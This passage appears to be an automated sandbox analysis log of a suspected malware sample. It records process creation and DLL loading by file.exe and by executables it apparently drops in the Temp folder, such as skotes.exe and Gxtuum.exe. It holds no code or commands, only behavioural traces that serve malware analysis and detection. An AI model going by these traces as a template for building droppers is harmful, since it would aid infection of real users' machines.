                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,9689288529753768681,16251776256977340336,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: webio.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: schannel.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: mskeyprotect.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: ncryptsslp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: msasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: gpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: amsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: mstask.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: dui70.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: duser.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: chartv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: oleacc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: atlthunk.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: textinputframework.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: coreuicomponents.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: wtsapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: winsta.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: windows.fileexplorer.common.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: explorerframe.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: netapi32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: samcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: taskschd.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeSection loaded: iphlpapi.dll
